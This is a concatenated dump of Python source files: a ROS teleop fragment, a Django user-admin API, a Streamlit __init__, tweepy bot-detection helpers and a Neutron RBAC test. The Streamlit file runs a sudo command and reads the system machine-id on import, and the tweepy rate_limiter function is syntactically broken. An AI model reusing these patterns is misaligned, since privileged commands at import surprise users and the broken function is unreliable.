target_speed, control_speed - 0.02 )\n else:\n control_speed = target_speed\n\n if target_turn > control_turn:\n control_turn = min( target_turn, control_turn + 0.1 )\n elif target_turn < control_turn:\n control_turn = max( target_turn, control_turn - 0.1 )\n else:\n control_turn = target_turn\n\n pub_pick.publish(control_turn) # Picking Arm speed\n pub_rotate.publish(control_speed) # Rotating Arm speed\n pub_jaw.publish(control_turn) # Jaw Arm speed\n\n\n except:\n print e\n\n finally:\n pub_pick.publish(control_turn) # Picking Arm speed\n pub_rotate.publish(control_speed) # Rotating Arm speed\n pub_jaw.publish(control_turn) # Jaw Arm speed\n\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n"} {"ext": "py", "sha": "1a306abb7ff91026b161aeec3c83ee5cd270bbb2", "content": "import os\nimport argus\n\n_example = argus.EXAMPLE_DRAG_CLOTH\n\npython_path = os.path.dirname(os.path.realpath(__file__))\nargus_interface = os.path.join(python_path, 'argus_interface.py')\n\nos.system('python {} -e {}'.format(argus_interface, _example))"} {"ext": "py", "sha": "1a306b2e32fa597fe500c61d1affcd6e636d84e9", "content": "import os\nimport re\nimport xlsxwriter\n\nfrom django.db import transaction, IntegrityError\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.contrib.auth.hashers import make_password\n\nfrom submission.models import Submission\nfrom utils.api import APIView, validate_serializer\nfrom utils.shortcuts import rand_str\n\nfrom ..decorators import super_admin_required\nfrom ..models import AdminType, ProblemPermission, User, UserProfile\nfrom ..serializers import EditUserSerializer, UserAdminSerializer, GenerateUserSerializer\nfrom ..serializers import ImportUserSeralizer\n\n\nclass UserAdminAPI(APIView):\n @validate_serializer(ImportUserSeralizer)\n @super_admin_required\n def post(self, request):\n \"\"\"\n Import User\n \"\"\"\n data = request.data[\"users\"]\n\n user_list = []\n for user_data in data:\n if len(user_data) != 3 or len(user_data[0]) > 32:\n return self.error(f\"Error occurred while processing data '{user_data}'\")\n user_list.append(User(username=user_data[0], password=make_password(user_data[1]), email=user_data[2]))\n\n try:\n with transaction.atomic():\n ret = User.objects.bulk_create(user_list)\n UserProfile.objects.bulk_create([UserProfile(user=user) for user in ret])\n return self.success()\n except IntegrityError as e:\n # Extract detail from exception message\n # duplicate key value violates unique constraint \"user_username_key\"\n # DETAIL: Key (username)=(root11) already exists.\n return self.error(str(e).split(\"\\n\")[1])\n\n @validate_serializer(EditUserSerializer)\n @super_admin_required\n def put(self, request):\n \"\"\"\n Edit user api\n \"\"\"\n data = request.data\n if not data[\"sno\"].isdigit():\n return self.error(\"Student ID must be digital\")\n try:\n user = User.objects.get(id=data[\"id\"])\n except User.DoesNotExist:\n return self.error(\"User does not exist\")\n if User.objects.filter(username=data[\"username\"].lower()).exclude(id=user.id).exists():\n return self.error(\"Username already exists\")\n if User.objects.filter(email=data[\"email\"].lower()).exclude(id=user.id).exists():\n return self.error(\"Email already exists\")\n if User.objects.filter(sno=data[\"sno\"]).exclude(id=user.id).exists():\n return self.error(\"Student ID already exists\")\n\n pre_username = user.username\n user.username = data[\"username\"].lower()\n user.sno = data[\"sno\"]\n user.email = data[\"email\"].lower()\n user.admin_type = data[\"admin_type\"]\n user.is_disabled = data[\"is_disabled\"]\n\n if data[\"admin_type\"] == AdminType.ADMIN:\n user.problem_permission = data[\"problem_permission\"]\n elif data[\"admin_type\"] == AdminType.SUPER_ADMIN:\n user.problem_permission = ProblemPermission.ALL\n else:\n user.problem_permission = ProblemPermission.NONE\n\n if data[\"password\"]:\n user.set_password(data[\"password\"])\n\n if data[\"open_api\"]:\n # Avoid reset user appkey after saving changes\n if not user.open_api:\n user.open_api_appkey = rand_str()\n else:\n user.open_api_appkey = None\n user.open_api = data[\"open_api\"]\n\n if data[\"two_factor_auth\"]:\n # Avoid reset user tfa_token after saving changes\n if not user.two_factor_auth:\n user.tfa_token = rand_str()\n else:\n user.tfa_token = None\n\n user.two_factor_auth = data[\"two_factor_auth\"]\n\n user.save()\n if pre_username != user.username:\n Submission.objects.filter(username=pre_username).update(username=user.username)\n\n UserProfile.objects.filter(user=user).update(real_name=data[\"real_name\"])\n return self.success(UserAdminSerializer(user).data)\n\n @super_admin_required\n def get(self, request):\n \"\"\"\n User list api / Get user by id\n \"\"\"\n user_id = request.GET.get(\"id\")\n if user_id:\n try:\n user = User.objects.get(id=user_id)\n except User.DoesNotExist:\n return self.error(\"User does not exist\")\n return self.success(UserAdminSerializer(user).data)\n\n user = User.objects.all().order_by(\"-create_time\")\n\n keyword = request.GET.get(\"keyword\", None)\n if keyword:\n user = user.filter(Q(username__icontains=keyword) |\n Q(userprofile__real_name__icontains=keyword) |\n Q(email__icontains=keyword))\n return self.success(self.paginate_data(request, user, UserAdminSerializer))\n\n @super_admin_required\n def delete(self, request):\n id = request.GET.get(\"id\")\n if not id:\n return self.error(\"Invalid Parameter, id is required\")\n ids = id.split(\",\")\n if str(request.user.id) in ids:\n return self.error(\"Current user can not be deleted\")\n User.objects.filter(id__in=ids).delete()\n return self.success()\n\n\nclass GenerateUserAPI(APIView):\n @super_admin_required\n def get(self, request):\n \"\"\"\n download users excel\n \"\"\"\n file_id = request.GET.get(\"file_id\")\n if not file_id:\n return self.error(\"Invalid Parameter, file_id is required\")\n if not re.match(r\"^[a-zA-Z0-9]+$\", file_id):\n return self.error(\"Illegal file_id\")\n file_path = f\"/tmp/{file_id}.xlsx\"\n if not os.path.isfile(file_path):\n return self.error(\"File does not exist\")\n with open(file_path, \"rb\") as f:\n raw_data = f.read()\n os.remove(file_path)\n response = HttpResponse(raw_data)\n response[\"Content-Disposition\"] = f\"attachment; filename=users.xlsx\"\n response[\"Content-Type\"] = \"application/xlsx\"\n return response\n\n @validate_serializer(GenerateUserSerializer)\n @super_admin_required\n def post(self, request):\n \"\"\"\n Generate User\n \"\"\"\n data = request.data\n number_max_length = max(len(str(data[\"number_from\"])), len(str(data[\"number_to\"])))\n if number_max_length + len(data[\"prefix\"]) + len(data[\"suffix\"]) > 32:\n return self.error(\"Username should not more than 32 characters\")\n if data[\"number_from\"] > data[\"number_to\"]:\n return self.error(\"Start number must be lower than end number\")\n\n file_id = rand_str(8)\n filename = f\"/tmp/{file_id}.xlsx\"\n workbook = xlsxwriter.Workbook(filename)\n worksheet = workbook.add_worksheet()\n worksheet.set_column(\"A:B\", 20)\n worksheet.write(\"A1\", \"Username\")\n worksheet.write(\"B1\", \"Password\")\n i = 1\n\n user_list = []\n for number in range(data[\"number_from\"], data[\"number_to\"] + 1):\n raw_password = rand_str(data[\"password_length\"])\n user = User(username=f\"{data['prefix']}{number}{data['suffix']}\", password=make_password(raw_password))\n user.raw_password = raw_password\n user_list.append(user)\n\n try:\n with transaction.atomic():\n\n ret = User.objects.bulk_create(user_list)\n UserProfile.objects.bulk_create([UserProfile(user=user) for user in ret])\n for item in user_list:\n worksheet.write_string(i, 0, item.username)\n worksheet.write_string(i, 1, item.raw_password)\n i += 1\n workbook.close()\n return self.success({\"file_id\": file_id})\n except IntegrityError as e:\n # Extract detail from exception message\n # duplicate key value violates unique constraint \"user_username_key\"\n # DETAIL: Key (username)=(root11) already exists.\n return self.error(str(e).split(\"\\n\")[1])\n"} {"ext": "py", "sha": "1a306d74c0958fc49aa211201e934089b0d6794d", "content": "# Copyright 2018-2020 Streamlit Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Streamlit.\n\nHow to use Streamlit in 3 seconds:\n\n 1. Write an app\n >>> import streamlit as st\n >>> st.write(anything_you_want)\n\n 2. Run your app\n $ streamlit run my_script.py\n\n 3. Use your app\n A new tab will open on your browser. That's your Streamlit app!\n\n 4. Modify your code, save it, and watch changes live on your browser.\n\nTake a look at the other commands in this module to find out what else\nStreamlit can do:\n\n >>> dir(streamlit)\n\nOr try running our \"Hello World\":\n\n $ streamlit hello\n\nFor more detailed info, see https://docs.streamlit.io.\n\"\"\"\n\n# IMPORTANT: Prefix with an underscore anything that the user shouldn't see.\n\n# NOTE: You'll see lots of \"noqa: F821\" in this file. That's because we\n# manually mess with the local namespace so the linter can't know that some\n# identifiers actually exist in the namespace.\n\n# Must be at the top, to avoid circular dependency.\nfrom streamlit import logger as _logger\nfrom streamlit import config as _config\n\n_LOGGER = _logger.get_logger(\"root\")\n\n# Give the package a version.\nimport pkg_resources as _pkg_resources\nimport uuid as _uuid\nimport subprocess\nimport platform\nimport os\nfrom typing import Any, List, Tuple, Type\n\n# This used to be pkg_resources.require('streamlit') but it would cause\n# pex files to fail. See #394 for more details.\n__version__ = _pkg_resources.get_distribution(\"streamlit\").version\n\n# Deterministic Unique Streamlit User ID\nif (\n platform.system() == \"Linux\"\n and os.path.isfile(\"/etc/machine-id\") == False\n and os.path.isfile(\"/var/lib/dbus/machine-id\") == False\n):\n print(\"Generate machine-id\")\n subprocess.run([\"sudo\", \"dbus-uuidgen\", \"--ensure\"])\n\nmachine_id = str(_uuid.getnode())\nif os.path.isfile(\"/etc/machine-id\"):\n with open(\"/etc/machine-id\", \"r\") as f:\n machine_id = f.read()\nelif os.path.isfile(\"/var/lib/dbus/machine-id\"):\n with open(\"/var/lib/dbus/machine-id\", \"r\") as f:\n machine_id = f.read()\n\n__installation_id__ = str(_uuid.uuid5(_uuid.NAMESPACE_DNS, machine_id))\n\n\nimport contextlib as _contextlib\nimport re as _re\nimport sys as _sys\nimport textwrap as _textwrap\nimport threading as _threading\nimport traceback as _traceback\nimport types as _types\nimport json as _json\nimport numpy as _np\n\nfrom streamlit import code_util as _code_util\nfrom streamlit import env_util as _env_util\nfrom streamlit import source_util as _source_util\nfrom streamlit import string_util as _string_util\nfrom streamlit import type_util as _type_util\nfrom streamlit.DeltaGenerator import DeltaGenerator as _DeltaGenerator\nfrom streamlit.ReportThread import add_report_ctx as _add_report_ctx\nfrom streamlit.ReportThread import get_report_ctx as _get_report_ctx\nfrom streamlit.errors import StreamlitAPIException\nfrom streamlit.proto import BlockPath_pb2 as _BlockPath_pb2\nfrom streamlit.util import functools_wraps as _functools_wraps\n\n# Modules that the user should have access to. These are imported with \"as\"\n# syntax pass mypy checking with implicit_reexport disabled.\nfrom streamlit.caching import cache as cache # noqa: F401\n\n# This is set to True inside cli._main_run(), and is False otherwise.\n# If False, we should assume that DeltaGenerator functions are effectively\n# no-ops, and adapt gracefully.\n_is_running_with_streamlit = False\n\n\ndef _set_log_level():\n _logger.set_log_level(_config.get_option(\"global.logLevel\").upper())\n _logger.init_tornado_logs()\n\n\n# Make this file only depend on config option in an asynchronous manner. This\n# avoids a race condition when another file (such as a test file) tries to pass\n# in an alternative config.\n_config.on_config_parsed(_set_log_level, True)\n\n\n_main = _DeltaGenerator(container=_BlockPath_pb2.BlockPath.MAIN)\nsidebar = _DeltaGenerator(container=_BlockPath_pb2.BlockPath.SIDEBAR)\n\n# DeltaGenerator methods:\n\naltair_chart = _main.altair_chart # noqa: E221\narea_chart = _main.area_chart # noqa: E221\naudio = _main.audio # noqa: E221\nballoons = _main.balloons # noqa: E221\nbar_chart = _main.bar_chart # noqa: E221\nbokeh_chart = _main.bokeh_chart # noqa: E221\nbutton = _main.button # noqa: E221\ncheckbox = _main.checkbox # noqa: E221\ncode = _main.code # noqa: E221\ndataframe = _main.dataframe # noqa: E221\ndate_input = _main.date_input # noqa: E221\ndeck_gl_chart = _main.deck_gl_chart # noqa: E221\npydeck_chart = _main.pydeck_chart # noqa: E221\nempty = _main.empty # noqa: E221\nerror = _main.error # noqa: E221\nexception = _main.exception # noqa: E221\nbeta_set_favicon = _main.favicon # noqa: E221\nfile_uploader = _main.file_uploader # noqa: E221\ngraphviz_chart = _main.graphviz_chart # noqa: E221\nheader = _main.header # noqa: E221\nhelp = _main.help # noqa: E221\nimage = _main.image # noqa: E221\ninfo = _main.info # noqa: E221\njson = _main.json # noqa: E221\nlatex = _main.latex # noqa: E221\nline_chart = _main.line_chart # noqa: E221\nmap = _main.map # noqa: E221\nmarkdown = _main.markdown # noqa: E221\nmultiselect = _main.multiselect # noqa: E221\nnumber_input = _main.number_input # noqa: E221\nplotly_chart = _main.plotly_chart # noqa: E221\nprogress = _main.progress # noqa: E221\npyplot = _main.pyplot # noqa: E221\nradio = _main.radio # noqa: E221\nselectbox = _main.selectbox # noqa: E221\nslider = _main.slider # noqa: E221\nsubheader = _main.subheader # noqa: E221\nsuccess = _main.success # noqa: E221\ntable = _main.table # noqa: E221\ntext = _main.text # noqa: E221\ntext_area = _main.text_area # noqa: E221\ntext_input = _main.text_input # noqa: E221\ntime_input = _main.time_input # noqa: E221\ntitle = _main.title # noqa: E221\nvega_lite_chart = _main.vega_lite_chart # noqa: E221\nvideo = _main.video # noqa: E221\nwarning = _main.warning # noqa: E221\nbeta_color_picker = _main.beta_color_picker # noqa: E221\n\n# Config\n\nget_option = _config.get_option\n\n\ndef set_option(key, value):\n \"\"\"Set config option.\n\n Currently, only two config options can be set within the script itself:\n * client.caching\n * client.displayEnabled\n\n Calling with any other options will raise StreamlitAPIException.\n\n Run `streamlit config show` in the terminal to see all available options.\n\n Parameters\n ----------\n key : str\n The config option key of the form \"section.optionName\". To see all\n available options, run `streamlit config show` on a terminal.\n\n value\n The new value to assign to this config option.\n\n \"\"\"\n opt = _config._config_options[key]\n if opt.scriptable:\n _config.set_option(key, value)\n return\n\n raise StreamlitAPIException(\n \"{key} cannot be set on the fly. Set as command line option, e.g. streamlit run script.py --{key}, or in config.toml instead.\".format(\n key=key\n )\n )\n\n\n# Special methods:\n\n_HELP_TYPES = (\n _types.BuiltinFunctionType,\n _types.BuiltinMethodType,\n _types.FunctionType,\n _types.MethodType,\n _types.ModuleType,\n) # type: Tuple[Type[Any], ...]\n\n\ndef write(*args, **kwargs):\n \"\"\"Write arguments to the app.\n\n This is the Swiss Army knife of Streamlit commands: it does different\n things depending on what you throw at it. Unlike other Streamlit commands,\n write() has some unique properties:\n\n 1. You can pass in multiple arguments, all of which will be written.\n 2. Its behavior depends on the input types as follows.\n 3. It returns None, so it's \"slot\" in the App cannot be reused.\n\n Parameters\n ----------\n *args : any\n One or many objects to print to the App.\n\n Arguments are handled as follows:\n\n - write(string) : Prints the formatted Markdown string, with\n support for LaTeX expression and emoji shortcodes.\n See docs for st.markdown for more.\n - write(data_frame) : Displays the DataFrame as a table.\n - write(error) : Prints an exception specially.\n - write(func) : Displays information about a function.\n - write(module) : Displays information about the module.\n - write(dict) : Displays dict in an interactive widget.\n - write(obj) : The default is to print str(obj).\n - write(mpl_fig) : Displays a Matplotlib figure.\n - write(altair) : Displays an Altair chart.\n - write(keras) : Displays a Keras model.\n - write(graphviz) : Displays a Graphviz graph.\n - write(plotly_fig) : Displays a Plotly figure.\n - write(bokeh_fig) : Displays a Bokeh figure.\n - write(sympy_expr) : Prints SymPy expression using LaTeX.\n\n unsafe_allow_html : bool\n This is a keyword-only argument that defaults to False.\n\n By default, any HTML tags found in strings will be escaped and\n therefore treated as pure text. This behavior may be turned off by\n setting this argument to True.\n\n That said, *we strongly advise* against it*. It is hard to write secure\n HTML, so by using this argument you may be compromising your users'\n security. For more information, see:\n\n https://github.com/streamlit/streamlit/issues/152\n\n **Also note that `unsafe_allow_html` is a temporary measure and may be\n removed from Streamlit at any time.**\n\n If you decide to turn on HTML anyway, we ask you to please tell us your\n exact use case here:\n https://discuss.streamlit.io/t/96 .\n\n This will help us come up with safe APIs that allow you to do what you\n want.\n\n Example\n -------\n\n Its simplest use case is to draw Markdown-formatted text, whenever the\n input is a string:\n\n >>> write('Hello, *World!* :sunglasses:')\n\n .. output::\n https://share.streamlit.io/0.50.2-ZWk9/index.html?id=Pn5sjhgNs4a8ZbiUoSTRxE\n height: 50px\n\n As mentioned earlier, `st.write()` also accepts other data formats, such as\n numbers, data frames, styled data frames, and assorted objects:\n\n >>> st.write(1234)\n >>> st.write(pd.DataFrame({\n ... 'first column': [1, 2, 3, 4],\n ... 'second column': [10, 20, 30, 40],\n ... }))\n\n .. output::\n https://share.streamlit.io/0.25.0-2JkNY/index.html?id=FCp9AMJHwHRsWSiqMgUZGD\n height: 250px\n\n Finally, you can pass in multiple arguments to do things like:\n\n >>> st.write('1 + 1 = ', 2)\n >>> st.write('Below is a DataFrame:', data_frame, 'Above is a dataframe.')\n\n .. output::\n https://share.streamlit.io/0.25.0-2JkNY/index.html?id=DHkcU72sxYcGarkFbf4kK1\n height: 300px\n\n Oh, one more thing: `st.write` accepts chart objects too! For example:\n\n >>> import pandas as pd\n >>> import numpy as np\n >>> import altair as alt\n >>>\n >>> df = pd.DataFrame(\n ... np.random.randn(200, 3),\n ... columns=['a', 'b', 'c'])\n ...\n >>> c = alt.Chart(df).mark_circle().encode(\n ... x='a', y='b', size='c', color='c', tooltip=['a', 'b', 'c'])\n >>>\n >>> st.write(c)\n\n .. output::\n https://share.streamlit.io/0.25.0-2JkNY/index.html?id=8jmmXR8iKoZGV4kXaKGYV5\n height: 200px\n\n \"\"\"\n try:\n string_buffer = [] # type: List[str]\n unsafe_allow_html = kwargs.get(\"unsafe_allow_html\", False)\n\n def flush_buffer():\n if string_buffer:\n markdown(\n \" \".join(string_buffer), unsafe_allow_html=unsafe_allow_html,\n ) # noqa: F821\n string_buffer[:] = []\n\n for arg in args:\n # Order matters!\n if isinstance(arg, str):\n string_buffer.append(arg)\n elif _type_util.is_dataframe_like(arg):\n flush_buffer()\n if len(_np.shape(arg)) > 2:\n text(arg)\n else:\n dataframe(arg) # noqa: F821\n elif isinstance(arg, Exception):\n flush_buffer()\n exception(arg) # noqa: F821\n elif isinstance(arg, _HELP_TYPES):\n flush_buffer()\n help(arg)\n elif _type_util.is_altair_chart(arg):\n flush_buffer()\n altair_chart(arg)\n elif _type_util.is_type(arg, \"matplotlib.figure.Figure\"):\n flush_buffer()\n pyplot(arg)\n elif _type_util.is_plotly_chart(arg):\n flush_buffer()\n plotly_chart(arg)\n elif _type_util.is_type(arg, \"bokeh.plotting.figure.Figure\"):\n flush_buffer()\n bokeh_chart(arg)\n elif _type_util.is_graphviz_chart(arg):\n flush_buffer()\n graphviz_chart(arg)\n elif _type_util.is_sympy_expession(arg):\n flush_buffer()\n latex(arg)\n elif _type_util.is_keras_model(arg):\n from tensorflow.python.keras.utils import vis_utils\n\n flush_buffer()\n dot = vis_utils.model_to_dot(arg)\n graphviz_chart(dot.to_string())\n elif isinstance(arg, (dict, list)):\n flush_buffer()\n json(arg)\n elif _type_util.is_namedtuple(arg):\n flush_buffer()\n json(_json.dumps(arg._asdict()))\n elif _type_util.is_pydeck(arg):\n flush_buffer()\n pydeck_chart(arg)\n else:\n string_buffer.append(\"`%s`\" % str(arg).replace(\"`\", \"\\\\`\"))\n\n flush_buffer()\n\n except Exception:\n _, exc, exc_tb = _sys.exc_info()\n exception(exc, exc_tb) # noqa: F821\n\n\ndef experimental_show(*args):\n \"\"\"Write arguments and *argument names* to your app for debugging purposes.\n\n Show() has similar properties to write():\n\n 1. You can pass in multiple arguments, all of which will be debugged.\n 2. It returns None, so it's \"slot\" in the app cannot be reused.\n\n Note: This is an experimental feature. See\n https://docs.streamlit.io/en/latest/pre_release_features.html for more information.\n\n Parameters\n ----------\n *args : any\n One or many objects to debug in the App.\n\n Example\n -------\n\n >>> dataframe = pd.DataFrame({\n ... 'first column': [1, 2, 3, 4],\n ... 'second column': [10, 20, 30, 40],\n ... }))\n >>> st.experimental_show(dataframe)\n\n Notes\n -----\n\n This is an experimental feature with usage limitations:\n\n - The method must be called with the name `show`.\n - Must be called in one line of code, and only once per line.\n - When passing multiple arguments the inclusion of `,` or `)` in a string\n argument may cause an error.\n\n \"\"\"\n if not args:\n return\n\n try:\n import inspect\n\n # Get the calling line of code\n current_frame = inspect.currentframe()\n if current_frame is None:\n warning(\"`show` not enabled in the shell\")\n return\n lines = inspect.getframeinfo(current_frame.f_back)[3]\n\n if not lines:\n warning(\"`show` not enabled in the shell\")\n return\n\n # Parse arguments from the line\n line = lines[0].split(\"show\", 1)[1]\n inputs = _code_util.get_method_args_from_code(args, line)\n\n # Escape markdown and add deltas\n for idx, input in enumerate(inputs):\n escaped = _string_util.escape_markdown(input)\n\n markdown(\"**%s**\" % escaped)\n write(args[idx])\n\n except Exception:\n _, exc, exc_tb = _sys.exc_info()\n exception(exc, exc_tb) # noqa: F821\n\n\n@_contextlib.contextmanager\ndef spinner(text=\"In progress...\"):\n \"\"\"Temporarily displays a message while executing a block of code.\n\n Parameters\n ----------\n text : str\n A message to display while executing that block\n\n Example\n -------\n\n >>> with st.spinner('Wait for it...'):\n >>> time.sleep(5)\n >>> st.success('Done!')\n\n \"\"\"\n import streamlit.caching as caching\n\n # @st.cache optionally uses spinner for long-running computations.\n # Normally, streamlit warns the user when they call st functions\n # from within an @st.cache'd function. But we do *not* want to show\n # these warnings for spinner's message, so we create and mutate this\n # message delta within the \"suppress_cached_st_function_warning\"\n # context.\n with caching.suppress_cached_st_function_warning():\n message = empty()\n\n try:\n # Set the message 0.1 seconds in the future to avoid annoying\n # flickering if this spinner runs too quickly.\n DELAY_SECS = 0.1\n display_message = True\n display_message_lock = _threading.Lock()\n\n def set_message():\n with display_message_lock:\n if display_message:\n with caching.suppress_cached_st_function_warning():\n message.warning(str(text))\n\n _add_report_ctx(_threading.Timer(DELAY_SECS, set_message)).start()\n\n # Yield control back to the context.\n yield\n finally:\n if display_message_lock:\n with display_message_lock:\n display_message = False\n with caching.suppress_cached_st_function_warning():\n message.empty()\n\n\n_SPACES_RE = _re.compile(\"\\\\s*\")\n\n\n@_contextlib.contextmanager\ndef echo(code_location=\"above\"):\n \"\"\"Use in a `with` block to draw some code on the app, then execute it.\n\n Parameters\n ----------\n code_location : \"above\" or \"below\"\n Whether to show the echoed code before or after the results of the\n executed code block.\n\n Example\n -------\n\n >>> with st.echo():\n >>> st.write('This code will be printed')\n\n \"\"\"\n if code_location == \"below\":\n show_code = code\n show_warning = warning\n else:\n placeholder = empty() # noqa: F821\n show_code = placeholder.code\n show_warning = placeholder.warning\n\n try:\n frame = _traceback.extract_stack()[-3]\n filename, start_line = frame.filename, frame.lineno\n yield\n frame = _traceback.extract_stack()[-3]\n end_line = frame.lineno\n lines_to_display = [] # type: List[str]\n with _source_util.open_python_file(filename) as source_file:\n source_lines = source_file.readlines()\n lines_to_display.extend(source_lines[start_line:end_line])\n match = _SPACES_RE.match(lines_to_display[0])\n initial_spaces = match.end() if match else 0\n for line in source_lines[end_line:]:\n match = _SPACES_RE.match(line)\n indentation = match.end() if match else 0\n # The != 1 is because we want to allow '\\n' between sections.\n if indentation != 1 and indentation < initial_spaces:\n break\n lines_to_display.append(line)\n line_to_display = _textwrap.dedent(\"\".join(lines_to_display))\n\n show_code(line_to_display, \"python\")\n\n except FileNotFoundError as err:\n show_warning(\"Unable to display code. %s\" % err)\n\n\ndef _transparent_write(*args):\n \"\"\"This is just st.write, but returns the arguments you passed to it.\"\"\"\n write(*args)\n if len(args) == 1:\n return args[0]\n return args\n\n\n# We want to show a warning when the user runs a Streamlit script without\n# 'streamlit run', but we need to make sure the warning appears only once no\n# matter how many times __init__ gets loaded.\n_repl_warning_has_been_displayed = False\n\n\ndef _maybe_print_repl_warning():\n global _repl_warning_has_been_displayed\n\n if not _repl_warning_has_been_displayed:\n _repl_warning_has_been_displayed = True\n\n if _env_util.is_repl():\n _LOGGER.warning(\n _textwrap.dedent(\n \"\"\"\n\n Will not generate Streamlit app\n\n To generate an app, use Streamlit in a file and run it with:\n $ streamlit run [FILE_NAME] [ARGUMENTS]\n\n \"\"\"\n )\n )\n\n elif _config.get_option(\"global.showWarningOnDirectExecution\"):\n script_name = _sys.argv[0]\n\n _LOGGER.warning(\n _textwrap.dedent(\n \"\"\"\n\n Will not generate Streamlit App\n\n To generate an App, run this file with:\n $ streamlit run %s [ARGUMENTS]\n\n \"\"\"\n ),\n script_name,\n )\n"} {"ext": "py", "sha": "1a306dccb8b41da09959fcc13ab1361f129ee05b", "content": "import tweepy\nimport csv\nimport time\nimport timeit\nimport datetime\nimport re\n\n\ndef tweetrate (listoftweets):\n #Takes a list of tweets of type tweepy.cursor(api.user_timeline,...), returns [rate of tweets in tweets per day (including fractional), total number of tweets in dataset, and the time period of the sample as a timedelta]\n tweet = []\n for tweet1 in listoftweets:\n tweet.append(tweet1.created_at)\n length = len(tweet)\n datebegin = tweet[0]\n dateend = tweet[length-1]\n return [(length-1)/((datebegin-dateend).days + (datebegin-dateend).seconds/86400), length, datebegin-dateend]\n\ndef maybe_enum (list, keep=\"off\"):\n #Checks to see which of a list of user names end in a sequence of numbers, possibly indicating that a username was automatically generated in sequence.\n #\n #An example of this might be a number of accounts that look like \"chair02003\", \"book20031\", \"world60063\" - a clear pattern of words followed by 5 digit sequences.\n #Of course, there are a bunch of reasons people put numbers in their names organicaly-- \"Trump2020\". \"SexySince1979\". \"n1ckn4m3\", etc.\n #\n #By default, maybe_enum returns a 2d list where list[x] = [user name, digit at end of username], ignoring all usernames that don't end in digits.\n #If the variable 'keep' is set to \"on\" - i.e., calling it as maybe_enum(list,\"on\") - it won't ignore the usernames that don't end in digits, but instead handle those like this: [\"nodigit\", -1]\n outlist = []\n for user in list:\n enum = re.search(r'\\d+$', user)\n if enum is not None:\n outlist.append([user, enum.group()])\n else:\n if keep == \"on\":\n outlist.append([user, -1])\n return outlist\n\ndef enum_sort (enums):\n #maybe you'd rather see your \"maybe_enum\" list in terms of how many names ended in sequences of digits of length (n). This will do that! Every outlist [n] = [total number of usernames ending in a sequence of length n, list of names fitting that criteria] \n outlist = [[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]]]\n for userstat in enums:\n outlist[len(userstat[1])][1].append(userstat[0])\n outlist[len(userstat[1])][0] = outlist[len(userstat[1])][0] + 1\n return outlist\n\n\ndef hasfollowers (user, thresh = 1):\n #takes a user of type api.get_user(user) and checks if it has at least 'thresh' number of followers. If no thresh is given, defaults to 1\n if user.friends_count > thresh:\n return (0)\n else:\n return (1) \n \ndef hastweeted (listoftweets, thresh=1):\n #Takes a list of tweets of type tweepy.Cursor(api.user_timeline...) and tells you if the account has tweeted at least thresh times (thresh defaults to 1\n tweet = []\n for tweet1 in listoftweets:\n tweet.append (tweet1)\n if len(tweet) > thresh:\n return (1)\n else:\n return (0)\n\n def rate_limiter(api):\n #This function checks if you've hit any twitter API limits. If you have, this module will pause your program until the limits reset,\n #checking every 60 seconds to see if they have. \n # DUMMY CODE FOR TWEEPY ERROR HANDLING\n #try:\n # [Tweepy API Call]\n #except tweepy.error.RateLimitError:\n # rate_limit_check()\n rate_limit = api.rate_limit_status()[\"resources\"]\n while true: \n for rate in rate_limit:\n endpoints = rate_limit[rate]\n for endpoint in endpoints:\n limit = rate_limit[rate][endpoint][\"limit\"]\n remaining = rate_limit[rate][endpoint][\"remaining\"]\n if remaining == 0:\n time.sleep(60)\n else return\n\n"} {"ext": "py", "sha": "1a306e594e2f2150ce955d3b38129b1e11f93425", "content": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom unittest import mock\n\nfrom neutron_lib.callbacks import events\nfrom neutron_lib import context as n_context\nfrom neutron_lib.db import model_base\nfrom neutron_lib import exceptions as n_exc\nfrom neutron_lib.objects import common_types\nfrom oslo_versionedobjects import fields as obj_fields\nimport sqlalchemy as sa\n\nfrom neutron.db import rbac_db_models\nfrom neutron.extensions import rbac as ext_rbac\nfrom neutron.objects import base\nfrom neutron.objects.db import api as obj_db_api\nfrom neutron.objects import rbac_db\nfrom neutron.tests.unit.objects import test_rbac\nfrom neutron.tests.unit import testlib_api\n\n\nclass FakeDbModel(dict):\n pass\n\n\nclass FakeRbacModel(rbac_db_models.RBACColumns, model_base.BASEV2):\n object_id = sa.Column(sa.String(36), nullable=False)\n object_type = 'fake_rbac_object'\n\n def get_valid_actions(self):\n return (rbac_db_models.ACCESS_SHARED,)\n\n\n@base.NeutronObjectRegistry.register_if(False)\nclass FakeNeutronRbacObject(base.NeutronDbObject):\n VERSION = '1.0'\n\n db_model = FakeRbacModel\n\n fields = {\n 'object_id': obj_fields.StringField(),\n 'target_tenant': obj_fields.StringField(),\n 'action': obj_fields.StringField(),\n }\n\n\n@base.NeutronObjectRegistry.register_if(False)\nclass FakeNeutronDbObject(rbac_db.NeutronRbacObject):\n # Version 1.0: Initial version\n VERSION = '1.0'\n\n rbac_db_cls = FakeNeutronRbacObject\n db_model = FakeDbModel\n\n fields = {\n 'id': common_types.UUIDField(),\n 'field1': obj_fields.StringField(),\n 'field2': obj_fields.StringField(),\n 'shared': obj_fields.BooleanField(default=False),\n }\n\n fields_no_update = ['id']\n\n synthetic_fields = ['field2']\n\n def get_bound_project_ids(cls, context, policy_id):\n pass\n\n\nclass RbacNeutronDbObjectTestCase(test_rbac.RBACBaseObjectIfaceTestCase,\n testlib_api.SqlTestCase):\n _test_class = FakeNeutronDbObject\n\n def setUp(self):\n super(RbacNeutronDbObjectTestCase, self).setUp()\n FakeNeutronDbObject.update_post = mock.Mock()\n\n 